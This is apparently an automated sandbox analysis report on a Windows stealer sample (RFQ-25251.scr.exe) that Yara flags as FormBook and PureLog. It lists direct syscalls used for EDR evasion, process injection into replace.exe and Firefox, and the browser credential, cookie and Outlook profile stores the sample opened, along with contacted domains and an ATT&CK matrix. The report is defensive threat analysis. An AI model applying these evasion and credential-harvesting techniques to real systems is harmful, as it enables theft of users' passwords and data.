                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280BBE mov eax, dword ptr fs:[00000030h]7_2_01280BBE
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129EBFC mov eax, dword ptr fs:[00000030h]7_2_0129EBFC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278BF0 mov eax, dword ptr fs:[00000030h]7_2_01278BF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278BF0 mov eax, dword ptr fs:[00000030h]7_2_01278BF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278BF0 mov eax, dword ptr fs:[00000030h]7_2_01278BF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FCBF0 mov eax, dword ptr fs:[00000030h]7_2_012FCBF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131EBD0 mov eax, dword ptr fs:[00000030h]7_2_0131EBD0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01290BCB mov eax, dword ptr fs:[00000030h]7_2_01290BCB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01290BCB mov eax, dword ptr fs:[00000030h]7_2_01290BCB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01290BCB mov eax, dword ptr fs:[00000030h]7_2_01290BCB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270BCD mov eax, dword ptr fs:[00000030h]7_2_01270BCD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270BCD mov eax, dword ptr fs:[00000030h]7_2_01270BCD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270BCD mov eax, dword ptr fs:[00000030h]7_2_01270BCD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129EA2E mov eax, dword ptr fs:[00000030h]7_2_0129EA2E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ACA24 mov eax, dword ptr fs:[00000030h]7_2_012ACA24
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ACA38 mov eax, dword ptr fs:[00000030h]7_2_012ACA38
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01294A35 mov eax, dword ptr fs:[00000030h]7_2_01294A35
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01294A35 mov eax, dword ptr fs:[00000030h]7_2_01294A35
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FCA11 mov eax, dword ptr fs:[00000030h]7_2_012FCA11
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ACA6F mov eax, dword ptr fs:[00000030h]7_2_012ACA6F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ACA6F mov eax, dword ptr fs:[00000030h]7_2_012ACA6F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ACA6F mov eax, dword ptr fs:[00000030h]7_2_012ACA6F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131EA60 mov eax, dword ptr fs:[00000030h]7_2_0131EA60
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ECA72 mov eax, dword ptr fs:[00000030h]7_2_012ECA72
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ECA72 mov eax, dword ptr fs:[00000030h]7_2_012ECA72
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280A5B mov eax, dword ptr fs:[00000030h]7_2_01280A5B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280A5B mov eax, dword ptr fs:[00000030h]7_2_01280A5B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276A50 mov eax, dword ptr fs:[00000030h]7_2_01276A50
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278AA0 mov eax, dword ptr fs:[00000030h]7_2_01278AA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278AA0 mov eax, dword ptr fs:[00000030h]7_2_01278AA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012C6AA4 mov eax, dword ptr fs:[00000030h]7_2_012C6AA4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA80 mov eax, dword ptr fs:[00000030h]7_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQueryValueKey: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtOpenKeyEx: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory written: C:\Users\user\Desktop\RFQ-25251.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: NULL target: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 1784Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3736316343.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000000.1500613377.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3736406534.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3736316343.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000000.1500613377.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3736406534.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3736316343.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000000.1500613377.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3736406534.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3736316343.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000000.1500613377.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3736406534.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Users\user\Desktop\RFQ-25251.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.78d0000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.32221b4.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1289692109.00000000078D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1286766644.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.78d0000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.32221b4.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1289692109.00000000078D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1286766644.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1441277 Sample: RFQ-25251.scr.exe Startdate: 14/05/2024 Architecture: WINDOWS Score: 100 32 www.www60270.xyz 2->32 34 www.valentinaetommaso.it 2->34 36 21 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 9 other signatures 2->52 10 RFQ-25251.scr.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Injects a PE file into a foreign processes 10->64 13 RFQ-25251.scr.exe 10->13         started        16 RFQ-25251.scr.exe 10->16         started        18 RFQ-25251.scr.exe 10->18         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 20 ZkvvIsytMpWTrpZoKvbY.exe 13->20 injected process8 signatures9 54 Found direct / indirect Syscall (likely to bypass EDR) 20->54 23 replace.exe 13 20->23         started        process10 signatures11 56 Tries to steal Mail credentials (via file / registry access) 23->56 